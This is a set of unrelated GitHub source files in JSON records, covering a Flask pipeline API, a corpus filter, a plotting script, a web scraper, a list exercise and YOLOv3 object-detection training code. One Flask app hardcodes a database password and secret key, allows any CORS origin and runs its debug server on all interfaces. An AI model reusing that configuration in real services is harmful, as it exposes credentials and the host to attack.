config_schema.type,\n \"description\": config_schema.description,\n \"default_value\": config_schema.default_value,\n })\n\n return jsonify(cfgs)\n\n def __modify_outputs_config_registry(self) -> Response:\n \"\"\"\n Modifies the outputs config registry.\n\n # Returns\n Response: The response.\n \"\"\"\n errors = []\n if request.method == \"PATCH\":\n body = self.__get_body()\n for output_name, values in body.items():\n if output_name not in self.__output_streams:\n return Response(\n f\"output stream with name {output_name} does not exist\", status=404)\n\n for name, value in values.items():\n try:\n self.__validate_and_set_value_for_output_stream_config(\n output_name, name, 
value)\n except BaseException:\n errors.append(f\"Invalid value for config '{name}'\")\n pass\n\n if len(errors) > 0:\n return jsonify(errors), 400\n\n cfgs = {}\n for output_name in self.__output_streams:\n cfgs[output_name] = []\n for config_name in self.__output_config_schema[output_name]:\n config_schema = self.__output_config_schema[output_name][config_name]\n cfgs[output_name].append({\n \"name\": config_name,\n \"label\": config_schema.label,\n \"value\": self.__output_config_registry[output_name].get(config_name),\n \"type\": config_schema.type,\n \"description\": config_schema.description,\n \"default_value\": config_schema.default_value,\n })\n\n return jsonify(cfgs)\n\n def __modify_output_config_registry(self, **kwargs) -> Response:\n \"\"\"\n Modifies the output config registry.\n\n # Arguments\n **kwargs: The keyword arguments.\n\n # Returns\n Response: The response.\n \"\"\"\n output_name = kwargs[\"output_stream\"]\n\n if output_name not in self.__output_streams:\n return Response(\n f\"output stream with name {output_name} does not exist\", status=404)\n\n errors = []\n if request.method == \"PATCH\":\n body = self.__get_body()\n for name, value in body.items():\n try:\n self.__validate_and_set_value_for_output_stream_config(\n output_name, name, value)\n except BaseException:\n errors.append(f\"Invalid value for config '{name}'\")\n pass\n\n if len(errors) > 0:\n return jsonify(errors), 400\n\n cfgs = []\n for config_name in self.__output_config_schema[output_name]:\n config_schema = self.__output_config_schema[output_name][config_name]\n cfgs.append({\n \"name\": config_name,\n \"label\": config_schema.label,\n \"value\": self.__output_config_registry[output_name].get(config_name),\n \"type\": config_schema.type,\n \"description\": config_schema.description,\n \"default_value\": config_schema.default_value,\n })\n\n return jsonify(cfgs)\n\n def __create_config_registry_for_output_stream(\n self,\n name: str,\n output_stream: OutputStream,\n default_config: dict = None) -> None:\n \"\"\"\n Creates the config registry for an output stream.\n\n # Arguments\n name: The name of the output stream.\n output_stream: The output stream.\n default_config: The default config. 
Defaults to `None`.\n \"\"\"\n self.__output_config_registry[name] = ConfigRegistry()\n\n output_stream_config_schema = output_stream.get_config_schema()\n config_schema_dict = {}\n for config_schema in output_stream_config_schema:\n validate_type(\n config_schema,\n Config,\n \"config_schema must be an instance of Config\")\n config_schema_dict[config_schema.name] = config_schema\n self.__output_config_registry[name].set_value(\n config_schema.name, config_schema.default_value)\n self.__output_config_schema[name] = config_schema_dict\n\n if default_config is not None:\n for config_name, value in default_config.items():\n self.__validate_and_set_value_for_output_stream_config(\n name, config_name, value)\n\n def __validate_and_set_value_for_output_stream_config(\n self, name: str, config_name: str, value: Any) -> None:\n \"\"\"\n Validates and sets the value for an output stream config.\n\n # Arguments\n name: The name of the output stream.\n config_name: The name of the config.\n value: The value.\n \"\"\"\n config_schema_dict = self.__output_config_schema[name]\n if config_name not in config_schema_dict:\n return\n\n config_schema = config_schema_dict[config_name]\n if not config_schema.is_valid(value):\n raise ValueError(f\"Invalid value for config '{config_name}'\")\n\n self.__output_config_registry[name].set_value(config_name, value)\n self.__output_streams[name][\"stream\"].set_config_value(\n config_name, value)\n\n def __get_body(self):\n \"\"\"\n Gets the body.\n\n # Returns\n dict: The body.\n \"\"\"\n if isinstance(request.json, str):\n return json.loads(request.json)\n else:\n validate_type(request.json, dict, \"request body must be a JSON\")\n return request.json\n\n def __swagger(self) -> Response:\n \"\"\"\n Swagger.\n\n # Returns\n Response: The response.\n \"\"\"\n return render_template(\"swaggerui.html\", base_path=self.__path)\n\n def __specs(self) -> Response:\n \"\"\"\n OpenAPI 2.0 specs.\n\n # Returns\n Response: The response.\n \"\"\"\n return render_template(\"openapi.json\", base_path=self.__path)\n\n def __set_perception_completion_callback(\n self, perception_completion_callback: Callable[[PerceptionObjectModel], None] = None):\n \"\"\"\n Sets the perception completion callback.\n\n # Arguments\n perception_completion_callback: The perception completion callback.\n \"\"\"\n if perception_completion_callback is not None:\n validate(callable(perception_completion_callback),\n \"perception_completion_callback must be a function\")\n\n self.__perception_completion_callback = perception_completion_callback\n\n def __kill(self, code, _) -> None:\n sys.exit(code)\n\n\nclass CustomJSONEncoder(JSONEncoder):\n \"\"\"\n Custom JSON encoder.\n \"\"\"\n\n def default(self, o):\n \"\"\"\n Default.\n\n # Arguments\n o: The object.\n\n # Returns\n Any: The result.\n \"\"\"\n if isinstance(o, RGB):\n return o.to_hex()\n else:\n return super().default(o)\n","repo_name":"darcyai/darcyai","sub_path":"src/darcyai/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":73036,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"15737835040","text":"from utilities.data_management import make_path\nfrom os import rename\nfrom multiprocessing import Pool\nfrom itertools import compress\nfrom pandas import DataFrame\nimport config\n\n\ndef long_enough(document, threshold=10):\n n_words = len(document.split(' '))\n\n return n_words >= threshold\n\n\nif __name__ == '__main__':\n directory = 
make_path('data/datasets/wikipedia_corpus')\n    file_path = directory / 'wikipedia_corpus.csv'\n    backup_path = directory / 'wikipedia_corpus_backup.csv'\n\n    if not (file_path.exists() or backup_path.exists()):\n        raise FileNotFoundError('File doesn\\'t exist.')\n    if not backup_path.exists():\n        print('Backing up.')\n        rename(file_path, backup_path)\n    print('Config done.')\n\n    with backup_path.open(encoding='utf-8') as fl:\n        content = fl.readlines()\n    print('Content loaded')\n\n    n_thread = config.n_threads\n    pool = Pool(n_thread)\n\n    non_header_mask = pool.map(long_enough, content)\n\n    pool.close()\n    pool.join()\n    print('Computed mask')\n\n    content = list(compress(content, non_header_mask))\n    content = DataFrame(content, columns=['document_content'])\n    print('Converted to DataFrame.')\n\n    content.to_csv(file_path, encoding='utf-8')\n\n    # index = 0\n    # with file_path.open('w', encoding='utf-8') as fl:\n    #     for document in compress(content, non_header_mask):\n    #         fl.write(str(index) + ',' + document)\n    #         index += 1\n\n    print('Done.')\n","repo_name":"simonsben/intent_detection","sub_path":"data/preparation/wikipedia_corpus.py","file_name":"wikipedia_corpus.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} {"seq_id":"23733682501","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jun 10 10:45:59 2018\r\n\r\nplotting taken from \" Introduction to python for Engineers\" By Sandeep Nagar, Apress\r\n\r\n@author: SIDHARTH\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom matplotlib import pylab as pl\r\n\r\npl.figure(figsize=(9,7), dpi=100)\r\npl.subplot(1,1,1)\r\nX = np.linspace(-np.pi*2, np.pi*2, 100000, endpoint=True)\r\nS , S2 = np.sin(X), np.cos(X)\r\npl.plot(X,S,color =\"blue\", linewidth=1.0,linestyle=\"-\",label=\"$sin(x)$\")\r\npl.plot(X,S2,color=\"red\", linewidth=1.5,linestyle=\"--\",label=\"$cos(x)$\")\r\npl.xlim(-2*np.pi,2.5*np.pi)\r\npl.xticks(np.linspace(-2.5*np.pi,2.5*np.pi,9,endpoint=True))\r\npl.ylim(-1.2, 1.2)\r\npl.yticks(np.linspace(-1,1,5,endpoint=True))\r\npl.title('$sin(x)$ and $cos(x)$ waves')\r\npl.ylabel('$sin(x)$ and $cos(x)$')\r\npl.xlabel('$x$')\r\npl.grid(True)\r\npl.legend()\r\npl.show()\r\n","repo_name":"sidhu177/DataSci","sub_path":"Plot1.py","file_name":"Plot1.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
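# --- Illustrative sketch, not part of the original records. The wikipedia_corpus
# script above filters lines with a multiprocessing.Pool plus itertools.compress:
# map produces a boolean mask in parallel, and compress keeps only the lines
# where the mask is True. A condensed standalone version of the same pattern:
from itertools import compress
from multiprocessing import Pool

def long_enough(line, threshold=3):
    # keep lines with at least `threshold` whitespace-separated words
    return len(line.split()) >= threshold

if __name__ == "__main__":
    lines = ["short", "a much longer line", "tiny one", "three words here"]
    with Pool(2) as pool:
        mask = pool.map(long_enough, lines)
    kept = list(compress(lines, mask))
    assert kept == ["a much longer line", "three words here"]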
{"seq_id":"26210666748","text":"from flask import *\r\nimport flask_socketio\r\nimport os\r\nfrom sockets import comment\r\nfrom flask_sqlalchemy import SQLAlchemy\r\n\r\n\r\napp = Flask(__name__)\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:123456@127.0.0.1:3306/' \\\r\n                                        'moviedata?charset=utf8mb4'\r\napp.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True\r\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\r\napp.config['SECRET_KEY'] = '123456'\r\n\r\ndb = SQLAlchemy(app)\r\n\r\n\r\nfrom blueprints import play, users\r\napp.register_blueprint(play.bp)\r\napp.register_blueprint(users.user)\r\n\r\n\r\n@app.route('/')\r\ndef index():\r\n    return redirect(url_for(\"user.login\"))\r\n\r\n\r\n# socketio = flask_socketio.SocketIO(app)\r\nsocketio = flask_socketio.SocketIO(app, cors_allowed_origins=\"*\")\r\ncomment.register_comment(socketio)\r\n\r\nif __name__ == '__main__':\r\n    # app.run(host='0.0.0.0', port=80, debug=True, threaded='True')\r\n    socketio.run(app, host='0.0.0.0', port=5000, debug=True)\r\n\r\n","repo_name":"952079739/Vision","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} {"seq_id":"5756390861","text":"import asyncio\nfrom requests_html import AsyncHTMLSession\n\n\nclass TravisPerkinsScraper:\n    def __init__(self):\n        self.session = AsyncHTMLSession()\n\n    async def scrape_products_from_url(self, url):\n        response = await self.session.get(url)\n        await response.html.arender()\n        print(f\"Response code: {response.status_code}\")\n\n        blob = []\n        categories = response.html.find('div[data-test-id=\"category-wrapper\"]')\n        for category in categories:\n            title = category.find(\"h6\", first=True).text.strip()\n            img_url = category.find(\"img\", first=True).attrs[\"src\"][2:]\n            blob.append({\"title\": title, \"url\": img_url})\n            # print(f\"Category Name: {title}\\nImage URL: {img_url}\\n\")\n        return blob\n\n    async def scrape_categories(self):\n        url = f\"https://www.travisperkins.co.uk/product/c/1000000/\"\n        return await self.scrape_products_from_url(url)\n\n    async def scrape_building_materials(self):\n        url = f\"https://www.travisperkins.co.uk/product/building-materials/c/1500029/\"\n        return await self.scrape_products_from_url(url)\n\n    async def scrape_timber_materials(self):\n        url = f\"https://www.travisperkins.co.uk/product/timber-and-sheet-materials/c/1500000/\"\n        return await self.scrape_products_from_url(url)\n\n    async def scrape_decorating_materials(self):\n        url = f\"https://www.travisperkins.co.uk/product/decorating-and-interiors/c/1500538/\"\n        return await self.scrape_products_from_url(url)\n\n    async def scrape_products_by_category(self, category: object) -> object:\n        if category == \"Building Materials\":\n            return await self.scrape_building_materials()\n        elif category == \"Timber & Sheet Materials\":\n            return await self.scrape_timber_materials()\n        elif category == \"Decorating & Interiors\":\n            return await self.scrape_decorating_materials()\n        else:\n            error = f\"No handler found for the category: {category}\"\n            print(error)\n            return error\n\n\nasync def main():\n    # Wrap instance in async function to call it\n    instance = TravisPerkinsScraper()\n    data_one = await instance.scrape_decorating_materials()\n    data_two = await instance.scrape_products_by_category(\"Decorating & Interiors\")\n\n    print(data_one)\n    print(data_two)\n\n\nif __name__ == \"__main__\":\n    loop = asyncio.get_event_loop()\n    loop.run_until_complete(main())\n","repo_name":"EdAncerys/FastAPI","sub_path":"scrapers/travis_perkins.py","file_name":"travis_perkins.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} {"seq_id":"106207350","text":"response = input(\"what fruit will be added? 
> \")\n\nfruit_id_input = int(input(\"what's fruit ID?\"))\n\nadd_fruit_pos0 = input(\"What's fruit will be added in position 0?\")\nid_number = fruit_id_input -1\nfruit_list = [\"Apples\", \"Pears\",\"Oranges\",\"Peaches\"]\nfruit_list.append(response)\nprint(fruit_list)\nprint(fruit_list[id_number])\nadd_fruit_pos0 =[add_fruit_pos0,]\nadd_fruit_pos0_list = add_fruit_pos0 + fruit_list[:]\nprint(\"new fruit list after adding new fruit at pos 0:\", add_fruit_pos0_list)\nfruit_list.insert(0,add_fruit_pos0[0])\nprint(\"new list using 'insert': \", fruit_list)\nP_fruit_list = []\nfor i in fruit_list:\n if i[0] == \"P\":\n P_fruit_list.append(i)\n\nprint(\"fruit start with 'P': \", P_fruit_list)\n\ndL = fruit_list[:-2]\nprint(dL)\nnewList = fruit_list*2\nprint(\"double list: \",newList)\n#print(\"length of newList: \", len(newList))\n\nupdated_list = []\nm = 0\n\ndef remove_fruit(deleted_fruit, newList, updated_list):\n n =0\n for i in newList:\n if i == deleted_fruit:\n for j in newList:\n if j != deleted_fruit:\n updated_list.append(j)\n else:\n pass\n n = n+1\n break\n\n return updated_list, n\n\nwhile m<1:\n\n if m ==0:\n deleted_fruit = input(\"What fruit do you want to remove? \")\n if deleted_fruit == \"\":\n break\n updated_list, n =remove_fruit(deleted_fruit, newList, updated_list)\n m = n\nprint(\"this updated_list: \", updated_list)\n#print(\"length of updated_list: \", len(updated_list))\n","repo_name":"UWPCE-PythonCert-ClassRepos/SP_Online_PY210","sub_path":"students/anbaopham/Lesson 3/lesson_3_serries_1_2.py","file_name":"lesson_3_serries_1_2.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"44574651060","text":"import time, warnings\r\nimport os\r\nimport copy\r\nimport re\r\nimport json\r\nfrom typing import List, Tuple, Union, Optional, BinaryIO,Dict\r\nfrom PIL import Image, ImageColor, ImageDraw, ImageFont\r\nimport numpy as np\r\nimport traceback\r\nfrom pathlib import Path\r\nimport math\r\nimport torch\r\n\r\nfrom collections import defaultdict\r\nimport torchvision\r\nfrom enum import Enum\r\nimport uuid\r\nimport torch.nn as nn\r\nfrom torchvision.io import ImageReadMode\r\nfrom torch.optim import lr_scheduler\r\nfrom torchvision import datasets\r\nfrom torch.utils.data import Dataset\r\nfrom torchvision.ops import box_iou\r\nfrom torch.optim import SGD\r\nfrom torchvision import transforms\r\nfrom torch.cuda import amp\r\nfrom torch.utils.data import DataLoader\r\nfrom scipy.cluster.vq import kmeans\r\nimport random\r\nimport torch.nn.functional as F\r\nimport validate\r\nfrom torchvision.models import mobilenet_v2, inception_v3, resnet50, densenet121\r\nfrom torchvision.models.inception import InceptionOutputs\r\n\r\nfrom tqdm import tqdm\r\nimport cv2 as cv\r\n\r\n\r\nclass DetectionModelTrainer:\r\n\r\n def __init__(self) -> None:\r\n self.__device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n self.__cuda = (self.__device != \"cpu\")\r\n self.__model_type = \"\"\r\n self.__model = None\r\n self.__optimizer = None\r\n self.__data_dir = \"\"\r\n self.__classes: List[str] = None\r\n self.__num_classes = None\r\n self.__anchors = None\r\n self.__dataset_name = None\r\n self.__mini_batch_size: int = None\r\n self.__scaler = amp.GradScaler(enabled=self.__cuda)\r\n self.__lr_lambda = None\r\n self.__custom_train_dataset = None\r\n self.__custom_val_dataset = None\r\n self.__train_loader = None\r\n self.__val_loader = None\r\n\r\n self.__model_path: str = 
None\r\n self.__epochs: int = None\r\n self.__output_models_dir: str = None\r\n self.__output_json_dir: str = None\r\n\r\n def __set_training_param(self, epochs: int, accumulate: int) -> None:\r\n \r\n self.__lr_lambda = lambda x: (1 - x / (epochs - 1)) * (1.0 - 0.01) + 0.01\r\n self.__anchors = generate_anchors(\r\n self.__custom_train_dataset,\r\n n=9 if self.__model_type == \"yolov3\" else 6\r\n )\r\n self.__anchors = [round(i) for i in self.__anchors.reshape(-1).tolist()]\r\n if self.__model_type == \"yolov3\":\r\n self.__model = YoloV3(\r\n num_classes=self.__num_classes,\r\n anchors=self.__anchors,\r\n device=self.__device\r\n )\r\n elif self.__model_type == \"tiny-yolov3\":\r\n self.__model = YoloV3Tiny(\r\n num_classes=self.__num_classes,\r\n anchors=self.__anchors,\r\n device=self.__device\r\n )\r\n if self.__model_path:\r\n self.__load_model()\r\n\r\n w_d = (5e-4) * (self.__mini_batch_size * accumulate / 64) \r\n g0, g1, g2 = [], [], [] \r\n for m in self.__model.modules():\r\n if hasattr(m, 'bias') and isinstance(m.bias, torch.nn.Parameter): \r\n g2.append(m.bias)\r\n if isinstance(m, torch.nn.BatchNorm2d): \r\n g0.append(m.weight)\r\n elif hasattr(m, 'weight') and isinstance(m.weight, torch.nn.Parameter): \r\n g1.append(m.weight)\r\n\r\n self.__optimizer = SGD(\r\n g0,\r\n lr=1e-2,\r\n momentum=0.6,\r\n\r\n nesterov=True\r\n )\r\n self.__optimizer.add_param_group({'params': g1, 'weight_decay': w_d}) \r\n self.__optimizer.add_param_group({'params': g2}) \r\n self.__lr_scheduler = lr_scheduler.LambdaLR(\r\n self.__optimizer,\r\n lr_lambda=self.__lr_lambda\r\n )\r\n del g0, g1, g2\r\n self.__model.to(self.__device)\r\n\r\n def __load_model(self) -> None:\r\n try:\r\n state_dict = torch.load(self.__model_path, map_location=self.__device)\r\n\r\n new_state_dict = {k: v for k, v in state_dict.items() if\r\n k in self.__model.state_dict().keys() and v.shape == self.__model.state_dict()[k].shape}\r\n self.__model.load_state_dict(new_state_dict, strict=False)\r\n except Exception as e:\r\n print(\"pretrained weight loading failed. 
Defaulting to random weights.\")\r\n            return\r\n\r\n        print(\"=\" * 20)\r\n        print(\"Pretrained YOLOv3 model loaded to initialize weights\")\r\n        print(\"=\" * 20)\r\n\r\n    def __load_data(self) -> None:\r\n        self.__num_classes = len(self.__classes)\r\n        self.__dataset_name = os.path.basename(os.path.dirname(self.__data_dir + os.path.sep))\r\n        self.__custom_train_dataset = LoadImagesAndLabels(self.__data_dir, train=True)\r\n        self.__custom_val_dataset = LoadImagesAndLabels(self.__data_dir, train=False)\r\n        self.__train_loader = DataLoader(\r\n            self.__custom_train_dataset, batch_size=self.__mini_batch_size,\r\n            shuffle=True,\r\n            collate_fn=self.__custom_train_dataset.collate_fn\r\n        )\r\n        self.__val_loader = DataLoader(\r\n            self.__custom_val_dataset, batch_size=self.__mini_batch_size // 2,\r\n            shuffle=True, collate_fn=self.__custom_val_dataset.collate_fn\r\n        )\r\n\r\n    def setModelTypeAsYOLOv3(self) -> None:\r\n        self.__model_type = \"yolov3\"\r\n\r\n    def setModelTypeAsTinyYOLOv3(self) -> None:\r\n        self.__model_type = \"tiny-yolov3\"\r\n\r\n    def setDataDirectory(self, data_directory: str):\r\n\r\n        if os.path.isdir(data_directory):\r\n            self.__data_dir = data_directory\r\n        else:\r\n            raise ValueError(\r\n                \"The parameter passed should point to a valid directory\"\r\n            )\r\n\r\n    def setTrainConfig(self, object_names_array: List[str], batch_size: int = 4, num_experiments=100,\r\n                       train_from_pretrained_model: str = None):\r\n        self.__model_path = train_from_pretrained_model\r\n        if self.__model_path:\r\n            extension_check(self.__model_path)\r\n        self.__classes = object_names_array\r\n        self.__mini_batch_size = batch_size\r\n        self.__epochs = num_experiments\r\n        self.__output_models_dir = os.path.join(self.__data_dir, \"models\")\r\n        self.__output_json_dir = os.path.join(self.__data_dir, \"json\")\r\n\r\n    def trainModel(self) -> None:\r\n        self.__load_data()\r\n        os.makedirs(self.__output_models_dir, exist_ok=True)\r\n        os.makedirs(self.__output_json_dir, exist_ok=True)\r\n\r\n        mp, mr, map50, map50_95, best_fitness = 0, 0, 0, 0, 0.0\r\n        nbs = 64\r\n        nb = len(self.__train_loader)\r\n        nw = max(3 * nb, 1000)\r\n        last_opt_step = -1\r\n        prev_save_name, recent_save_name = \"\", \"\"\r\n\r\n        accumulate = max(round(nbs / self.__mini_batch_size), 1)\r\n\r\n        self.__set_training_param(self.__epochs, accumulate)\r\n\r\n        with open(os.path.join(self.__output_json_dir,\r\n                               f\"{self.__dataset_name}_{self.__model_type}_detection_config.json\"),\r\n                  \"w\") as configWriter:\r\n            json.dump(\r\n                {\r\n                    \"labels\": self.__classes,\r\n                    \"anchors\": self.__anchors\r\n                },\r\n                configWriter\r\n            )\r\n\r\n        since = time.time()\r\n\r\n        self.__lr_scheduler.last_epoch = -1\r\n\r\n        for epoch in range(1, self.__epochs + 1):\r\n            self.__optimizer.zero_grad()\r\n            mloss = torch.zeros(3, device=self.__device)\r\n            print(f\"Epoch {epoch}/{self.__epochs}\", \"-\" * 10, sep=\"\\n\")\r\n\r\n            for phase in [\"train\", \"validation\"]:\r\n                if phase == \"train\":\r\n                    self.__model.train()\r\n                    print(\"Train: \")\r\n                    for batch_i, (data, anns) in tqdm(enumerate(self.__train_loader)):\r\n                        batches_done = batch_i + nb * epoch\r\n\r\n                        data = data.to(self.__device)\r\n                        anns = anns.to(self.__device)\r\n\r\n                        if batches_done <= nw:\r\n                            xi = [0, nw]\r\n                            accumulate = max(1, np.interp(batches_done, xi, [1, nbs / self.__mini_batch_size]).round())\r\n                            for j, x in enumerate(self.__optimizer.param_groups):\r\n                                x['lr'] = np.interp(batches_done, xi,\r\n                                                    [0.1 if j == 2 else 0.0, 0.01 * self.__lr_lambda(epoch)])\r\n                                if 'momentum' in x:\r\n                                    x['momentum'] = np.interp(batches_done, xi, [0.8, 0.9])\r\n\r\n                        with amp.autocast(enabled=self.__cuda):\r\n                            _ = self.__model(data)\r\n                            loss_layers = self.__model.get_loss_layers()\r\n                            loss, loss_components = compute_loss(loss_layers, anns.detach(), self.__device)\r\n\r\n                        self.__scaler.scale(loss).backward()\r\n                        mloss = (mloss * batch_i + loss_components) / (batch_i + 1)\r\n\r\n                        if batches_done - last_opt_step >= accumulate:\r\n                            self.__scaler.step(self.__optimizer)\r\n                            self.__scaler.update()\r\n                            self.__optimizer.zero_grad()\r\n                            last_opt_step = batches_done\r\n\r\n                    print(\r\n                        f\"    box loss-> {float(mloss[0]):.5f}, object loss-> {float(mloss[1]):.5f}, class loss-> {float(mloss[2]):.5f}\")\r\n\r\n                    self.__lr_scheduler.step()\r\n\r\n                else:\r\n                    self.__model.eval()\r\n                    print(\"Validation:\")\r\n\r\n                    mp, mr, map50, map50_95 = validate.run(\r\n                        self.__model, self.__val_loader,\r\n                        self.__num_classes, device=self.__device\r\n                    )\r\n\r\n                    print(\r\n                        f\"    recall: {mr:0.6f} precision: {mp:0.6f} mAP@0.5: {map50:0.6f}, mAP@0.5-0.95: {map50_95:0.6f}\" \"\\n\")\r\n\r\n                    if map50 > best_fitness:\r\n                        best_fitness = map50\r\n                        recent_save_name = self.__model_type + f\"_{self.__dataset_name}_mAP-{best_fitness:0.5f}_epoch-{epoch}.pt\"\r\n                        if prev_save_name:\r\n                            os.remove(os.path.join(self.__output_models_dir, prev_save_name))\r\n                        torch.save(\r\n                            self.__model.state_dict(),\r\n                            os.path.join(self.__output_models_dir, recent_save_name)\r\n                        )\r\n                        prev_save_name = recent_save_name\r\n\r\n            if epoch == self.__epochs:\r\n                torch.save(\r\n                    self.__model.state_dict(),\r\n                    os.path.join(self.__output_models_dir, self.__model_type + f\"_{self.__dataset_name}_last.pt\")\r\n                )\r\n\r\n        elapsed_time = time.time() - since\r\n        print(f\"Training completed in {elapsed_time // 60:.0f}m {elapsed_time % 60:.0f}s\")\r\n        torch.cuda.empty_cache()\r\n\r\n\r\n
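# --- Illustrative sketch, not part of the original source. During the first `nw`
# batches, trainModel() warms hyper-parameters up with np.interp: each value is
# linearly interpolated between its start and end point as batches_done moves
# across [0, nw]. A small worked example of the momentum schedule used above:
import numpy as np

nw = 1000              # hypothetical warmup horizon in batches
xi = [0, nw]
for batches_done in (0, 250, 500, 1000):
    momentum = np.interp(batches_done, xi, [0.8, 0.9])
    print(batches_done, round(float(momentum), 3))
# prints 0.8, 0.825, 0.85, 0.9 -- and past nw, np.interp clamps at 0.9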
[0.8, 0.9])\r\n\r\n with amp.autocast(enabled=self.__cuda):\r\n _ = self.__model(data)\r\n loss_layers = self.__model.get_loss_layers()\r\n loss, loss_components = compute_loss(loss_layers, anns.detach(), self.__device)\r\n\r\n self.__scaler.scale(loss).backward()\r\n mloss = (mloss * batch_i + loss_components) / (batch_i + 1)\r\n\r\n \r\n if batches_done - last_opt_step >= accumulate:\r\n self.__scaler.step(self.__optimizer) \r\n self.__scaler.update()\r\n self.__optimizer.zero_grad()\r\n last_opt_step = batches_done\r\n\r\n print(\r\n f\" box loss-> {float(mloss[0]):.5f}, object loss-> {float(mloss[1]):.5f}, class loss-> {float(mloss[2]):.5f}\")\r\n\r\n self.__lr_scheduler.step()\r\n\r\n else:\r\n self.__model.eval()\r\n print(\"Validation:\")\r\n\r\n mp, mr, map50, map50_95 = validate.run(\r\n self.__model, self.__val_loader,\r\n self.__num_classes, device=self.__device\r\n )\r\n\r\n print(\r\n f\" recall: {mr:0.6f} precision: {mp:0.6f} mAP@0.5: {map50:0.6f}, mAP@0.5-0.95: {map50_95:0.6f}\" \"\\n\")\r\n\r\n if map50 > best_fitness:\r\n best_fitness = map50\r\n recent_save_name = self.__model_type + f\"_{self.__dataset_name}_mAP-{best_fitness:0.5f}_epoch-{epoch}.pt\"\r\n if prev_save_name:\r\n os.remove(os.path.join(self.__output_models_dir, prev_save_name))\r\n torch.save(\r\n self.__model.state_dict(),\r\n os.path.join(self.__output_models_dir, recent_save_name)\r\n )\r\n prev_save_name = recent_save_name\r\n\r\n if epoch == self.__epochs:\r\n torch.save(\r\n self.__model.state_dict(),\r\n os.path.join(self.__output_models_dir, self.__model_type + f\"_{self.__dataset_name}_last.pt\")\r\n )\r\n\r\n elapsed_time = time.time() - since\r\n print(f\"Training completed in {elapsed_time // 60:.0f}m {elapsed_time % 60:.0f}s\")\r\n torch.cuda.empty_cache()\r\n\r\n\r\nclass CustomObjectDetection:\r\n\r\n def __init__(self) -> None:\r\n self.__device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n self.__anchors: List[int] = None\r\n self.__classes: List[str] = None\r\n self.__model = None\r\n self.__model_loaded: bool = False\r\n self.__model_path: str = None\r\n self.__json_path: str = None\r\n self.__model_type: str = None\r\n self.__nms_score = 0.4\r\n self.__objectness_score = 0.4\r\n\r\n def setModelTypeAsYOLOv3(self) -> None:\r\n self.__model_type = \"yolov3\"\r\n\r\n def setModelTypeAsTinyYOLOv3(self) -> None:\r\n self.__model_type = \"tiny-yolov3\"\r\n\r\n def setModelPath(self, model_path: str):\r\n if os.path.isfile(model_path):\r\n extension_check(model_path)\r\n self.__model_path = model_path\r\n self.__model_loaded = False\r\n else:\r\n raise ValueError(\r\n \"invalid path, path not pointing to the weightfile.\"\r\n ) from None\r\n self.__model_path = model_path\r\n\r\n def setJsonPath(self, configuration_json: str):\r\n self.__json_path = configuration_json\r\n\r\n def __load_classes_and_anchors(self) -> List[str]:\r\n\r\n with open(self.__json_path) as f:\r\n json_config = json.load(f)\r\n self.__anchors = json_config[\"anchors\"]\r\n self.__classes = json_config[\"labels\"]\r\n\r\n def __load_image_yolo(self, input_image: Union[str, np.ndarray, Image.Image]) -> Tuple[\r\n List[str], List[np.ndarray], torch.Tensor, torch.Tensor]:\r\n\r\n allowed_exts = [\"jpg\", \"jpeg\", \"png\"]\r\n fnames = []\r\n original_dims = []\r\n inputs = []\r\n original_imgs = []\r\n if type(input_image) == str:\r\n if os.path.isfile(input_image):\r\n if input_image.rsplit('.')[-1].lower() in allowed_exts:\r\n img = cv.imread(input_image)\r\n else:\r\n raise ValueError(f\"image path 
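# The mixed-precision update used in the training loop above, reduced to a
# generic torch.cuda.amp skeleton (a sketch, not the exact trainer): forward
# under autocast, scale the loss before backward, and only step/update the
# scaler every `accumulate` batches.
import torch
from torch.cuda import amp

use_cuda = torch.cuda.is_available()
device = "cuda" if use_cuda else "cpu"
scaler = amp.GradScaler(enabled=use_cuda)
model = torch.nn.Linear(4, 2).to(device)
opt = torch.optim.SGD(model.parameters(), lr=1e-2)
accumulate, last_opt_step = 4, -1

for batches_done in range(8):
    x = torch.randn(2, 4, device=device)
    with amp.autocast(enabled=use_cuda):
        loss = model(x).sum()
    scaler.scale(loss).backward()
    if batches_done - last_opt_step >= accumulate:
        scaler.step(opt)    # unscales gradients; skips the step on inf/nan
        scaler.update()
        opt.zero_grad()
        last_opt_step = batches_done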
'{input_image}' is not found or a valid file\")\r\n elif type(input_image) == np.ndarray:\r\n img = input_image\r\n elif \"PIL\" in str(type(input_image)):\r\n img = np.asarray(input_image)\r\n else:\r\n raise ValueError(f\"Invalid image input format\")\r\n\r\n img_h, img_w, _ = img.shape\r\n\r\n original_imgs.append(np.array(cv.cvtColor(img, cv.COLOR_BGR2RGB)).astype(np.uint8))\r\n original_dims.append((img_w, img_h))\r\n if type(input_image) == str:\r\n fnames.append(os.path.basename(input_image))\r\n else:\r\n fnames.append(\"\")\r\n inputs.append(prepare_image(img, (416, 416)))\r\n\r\n if original_dims:\r\n return (\r\n fnames,\r\n original_imgs,\r\n torch.FloatTensor(original_dims).repeat(1, 2).to(self.__device),\r\n torch.cat(inputs, 0).to(self.__device)\r\n )\r\n raise RuntimeError(\r\n f\"Error loading image.\"\r\n \"\\nEnsure the file is a valid image,\"\r\n \" allowed file extensions are .jpg, .jpeg, .png\"\r\n )\r\n\r\n def useCPU(self):\r\n self.__device = \"cpu\"\r\n if self.__model_loaded:\r\n self.__model_loaded = False\r\n self.loadModel()\r\n\r\n def loadModel(self) -> 